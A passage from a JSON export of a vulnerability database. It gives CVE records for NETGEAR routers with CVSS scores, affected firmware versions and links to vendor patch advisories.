"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "CVE-2021-38525",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.9,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.2,
"id": "CVE-2021-38525",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "cve@mitre.org",
"availabilityImpact": "HIGH",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 0.9,
"id": "CVE-2021-38525",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.2,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2021-38525",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "High",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2021-38525",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "cve@mitre.org",
"id": "CVE-2021-38525",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2021-38525",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-202108-1009",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2021-38525",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-38525"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-010477"
},
{
"db": "CNNVD",
"id": "CNNVD-202108-1009"
},
{
"db": "NVD",
"id": "CVE-2021-38525"
},
{
"db": "NVD",
"id": "CVE-2021-38525"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Certain NETGEAR devices are affected by a stack-based buffer overflow by an authenticated user. This affects D3600 before 1.0.0.76, D6000 before 1.0.0.76, D6200 before 1.1.00.36, D7000 before 1.0.1.70, EX6200v2 before 1.0.1.78, EX7000 before 1.0.1.78, EX8000 before 1.0.1.186, JR6150 before 1.0.1.18, PR2000 before 1.0.0.28, R6020 before 1.0.0.42, R6050 before 1.0.1.18, R6080 before 1.0.0.42, R6120 before 1.0.0.46, R6220 before 1.1.0.80, R6260 before 1.1.0.64, R6300v2 before 1.0.4.34, R6700 before 1.0.2.6, R6700v2 before 1.2.0.36, R6800 before 1.2.0.36, R6900 before 1.0.2.4, R6900P before 1.3.1.64, R6900v2 before 1.2.0.36, R7000 before 1.0.9.42, R7000P before 1.3.1.64, R7800 before 1.0.2.60, R8900 before 1.0.4.12, R9000 before 1.0.4.12, and XR500 before 2.3.2.40. plural NETGEAR The product contains a vulnerability related to out-of-bounds writes.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. This affects D3600 prior to 1.0.0.76, D6000 prior to 1.0.0.76, D6200 prior to 1.1.00.36, D7000 prior to 1.0.1.70, EX6200v2 prior to 1.0.1.78, EX7000 prior to 1.0.1.78, EX8000 prior to 1.0.1.186, JR6150 prior to 1.0.1.18, PR2000 prior to 1.0.0.28, R6020 prior to 1.0.0.42, R6050 prior to 1.0.1.18, R6080 prior to 1.0.0.42, R6120 prior to 1.0.0.46, R6220 prior to 1.1.0.80, R6260 prior to 1.1.0.64, R6300v2 prior to 1.0.4.34, R6700 prior to 1.0.2.6, R6700v2 prior to 1.2.0.36, R6800 prior to 1.2.0.36, R6900 prior to 1.0.2.4, R6900P prior to 1.3.1.64, R6900v2 prior to 1.2.0.36, R7000 prior to 1.0.9.42, R7000P prior to 1.3.1.64, R7800 prior to 1.0.2.60, R8900 prior to 1.0.4.12, R9000 prior to 1.0.4.12, and XR500 prior to 2.3.2.40",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-38525"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-010477"
},
{
"db": "VULMON",
"id": "CVE-2021-38525"
}
],
"trust": 1.71
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2021-38525",
"trust": 3.3
},
{
"db": "JVNDB",
"id": "JVNDB-2021-010477",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202108-1009",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2021-38525",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-38525"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-010477"
},
{
"db": "CNNVD",
"id": "CNNVD-202108-1009"
},
{
"db": "NVD",
"id": "CVE-2021-38525"
}
]
},
"id": "VAR-202108-1631",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.3609387456000001
},
"last_update_date": "2024-08-14T13:43:25.054000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security\u00a0Advisory\u00a0for\u00a0Post-Authentication\u00a0Stack\u00a0Overflow\u00a0on\u00a0Some\u00a0Routers,\u00a0Gateways\u00a0and\u00a0Extenders,\u00a0PSV-2018-0378",
"trust": 0.8,
"url": "https://kb.netgear.com/000063759/Security-Advisory-for-Post-Authentication-Stack-Overflow-on-Some-Routers-Gateways-and-Extenders-PSV-2018-0378"
},
{
"title": "Netgear NETGEAR Buffer error vulnerability fix",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=159392"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-010477"
},
{
"db": "CNNVD",
"id": "CNNVD-202108-1009"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-787",
"trust": 1.0
},
{
"problemtype": "Out-of-bounds writing (CWE-787) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-010477"
},
{
"db": "NVD",
"id": "CVE-2021-38525"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "https://kb.netgear.com/000063759/security-advisory-for-post-authentication-stack-overflow-on-some-routers-gateways-and-extenders-psv-2018-0378"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-38525"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/787.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-38525"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-010477"
},
{
"db": "CNNVD",
"id": "CNNVD-202108-1009"
},
{
"db": "NVD",
"id": "CVE-2021-38525"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULMON",
"id": "CVE-2021-38525"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-010477"
},
{
"db": "CNNVD",
"id": "CNNVD-202108-1009"
},
{
"db": "NVD",
"id": "CVE-2021-38525"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-08-11T00:00:00",
"db": "VULMON",
"id": "CVE-2021-38525"
},
{
"date": "2022-07-01T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2021-010477"
},
{
"date": "2021-08-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202108-1009"
},
{
"date": "2021-08-11T00:16:09.323000",
"db": "NVD",
"id": "CVE-2021-38525"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-08-19T00:00:00",
"db": "VULMON",
"id": "CVE-2021-38525"
},
{
"date": "2022-07-01T09:11:00",
"db": "JVNDB",
"id": "JVNDB-2021-010477"
},
{
"date": "2021-08-20T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202108-1009"
},
{
"date": "2021-08-19T17:05:04.020000",
"db": "NVD",
"id": "CVE-2021-38525"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202108-1009"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural \u00a0NETGEAR\u00a0 Out-of-bounds write vulnerabilities in the product",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-010477"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202108-1009"
}
],
"trust": 0.6
}
}
var-202004-1359
Vulnerability from variot
Certain NETGEAR devices are affected by incorrect configuration of security settings. This affects D6220 before 1.0.0.32, D6400 before 1.0.0.66, D8500 before 1.0.3.35, DGN2200Bv4 before 1.0.0.94, DGN2200v4 before 1.0.0.94, R6250 before 1.0.4.14, R6300v2 before 1.0.4.18, R6400 before 1.01.32, R6400v2 before 1.0.2.44, R6700 before 1.0.1.36, R6900 before 1.0.1.30, R6900P before 1.3.0.8, R7000 before 1.0.9.14, R7000P before 1.3.0.8, R7100LG before 1.0.0.34, R7900 before 1.0.2.4, R8000 before 1.0.4.2, WN2500RPv2 before 1.0.1.50, WNDR3400v3 before 1.0.1.14, and WNDR4000 before 1.0.2.10. plural NETGEAR An unspecified vulnerability exists in the device.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. NETGEAR WNDR3400v3, etc. are all products of NETGEAR Corporation. NETGEAR WNDR3400v3 is a wireless router. The NETGEAR D6220 is a wireless modem. NETGEAR R6900 is a wireless router. No detailed vulnerability details are currently provided
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202004-1359",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "d6220",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.32"
},
{
"model": "r6400",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.01.32"
},
{
"model": "r6700",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.36"
},
{
"model": "r7000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.9.14"
},
{
"model": "r7000p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.3.0.8"
},
{
"model": "r6900p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.3.0.8"
},
{
"model": "r7100lg",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.34"
},
{
"model": "d6400",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.66"
},
{
"model": "d8500",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.3.35"
},
{
"model": "r7900",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.4"
},
{
"model": "r6900",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.30"
},
{
"model": "r8000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.4.2"
},
{
"model": "r6250",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.4.14"
},
{
"model": "wndr4000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.10"
},
{
"model": "dgn2200",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.94"
},
{
"model": "wndr3400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.14"
},
{
"model": "wn2500rp",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.50"
},
{
"model": "r6300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.18"
},
{
"model": "r6400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.44"
},
{
"model": "dgn2200b",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.94"
},
{
"model": "d6220",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.32"
},
{
"model": "d6400",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.66"
},
{
"model": "d8500",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.3.35"
},
{
"model": "dgn2200",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.94"
},
{
"model": "dgn2200b",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.94"
},
{
"model": "r6250",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.4.14"
},
{
"model": "r6300",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.4.18"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.2.44"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.01.32"
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.1.36"
},
{
"model": "r6300v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.4.18"
},
{
"model": "r6400v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.2.44"
},
{
"model": "dgn2200v4",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.0.94"
},
{
"model": "dgn2200bv4",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.0.94"
},
{
"model": "wndr3400v3",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.1.14"
},
{
"model": "wn2500rpv2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.1.50"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2022-13201"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014942"
},
{
"db": "NVD",
"id": "CVE-2017-18756"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:netgear:d6220_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d6400_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d8500_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:dgn2200_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:dgn2200b_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6250_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6300_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6400_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6700_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014942"
}
]
},
"cve": "CVE-2017-18756",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 6.5,
"id": "CVE-2017-18756",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.0,
"vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Adjacent Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 5.8,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "JVNDB-2017-014942",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 6.5,
"id": "CNVD-2022-13201",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2017-18756",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "cve@mitre.org",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2017-18756",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Adjacent Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2017-014942",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2017-18756",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "cve@mitre.org",
"id": "CVE-2017-18756",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "JVNDB-2017-014942",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2022-13201",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202004-1930",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2022-13201"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014942"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1930"
},
{
"db": "NVD",
"id": "CVE-2017-18756"
},
{
"db": "NVD",
"id": "CVE-2017-18756"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Certain NETGEAR devices are affected by incorrect configuration of security settings. This affects D6220 before 1.0.0.32, D6400 before 1.0.0.66, D8500 before 1.0.3.35, DGN2200Bv4 before 1.0.0.94, DGN2200v4 before 1.0.0.94, R6250 before 1.0.4.14, R6300v2 before 1.0.4.18, R6400 before 1.01.32, R6400v2 before 1.0.2.44, R6700 before 1.0.1.36, R6900 before 1.0.1.30, R6900P before 1.3.0.8, R7000 before 1.0.9.14, R7000P before 1.3.0.8, R7100LG before 1.0.0.34, R7900 before 1.0.2.4, R8000 before 1.0.4.2, WN2500RPv2 before 1.0.1.50, WNDR3400v3 before 1.0.1.14, and WNDR4000 before 1.0.2.10. plural NETGEAR An unspecified vulnerability exists in the device.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. NETGEAR WNDR3400v3, etc. are all products of NETGEAR Corporation. NETGEAR WNDR3400v3 is a wireless router. The NETGEAR D6220 is a wireless modem. NETGEAR R6900 is a wireless router. No detailed vulnerability details are currently provided",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-18756"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014942"
},
{
"db": "CNVD",
"id": "CNVD-2022-13201"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-18756",
"trust": 3.0
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014942",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2022-13201",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1930",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2022-13201"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014942"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1930"
},
{
"db": "NVD",
"id": "CVE-2017-18756"
}
]
},
"id": "VAR-202004-1359",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2022-13201"
}
],
"trust": 1.1137182095238094
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2022-13201"
}
]
},
"last_update_date": "2024-11-23T21:35:53.680000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security Advisory for Security Misconfiguration on Some Routers, Gateways, and Extenders, PSV-2017-2756",
"trust": 0.8,
"url": "https://kb.netgear.com/000051492/Security-Advisory-for-Security-Misconfiguration-on-Some-Routers-Gateways-and-Extenders-PSV-2017-2756"
},
{
"title": "Patch for Several NETGEAR products have unknown vulnerabilities (CNVD-2022-13201)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/321306"
},
{
"title": "Multiple NETGEAR Product security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=116701"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2022-13201"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014942"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1930"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-noinfo",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-18756"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
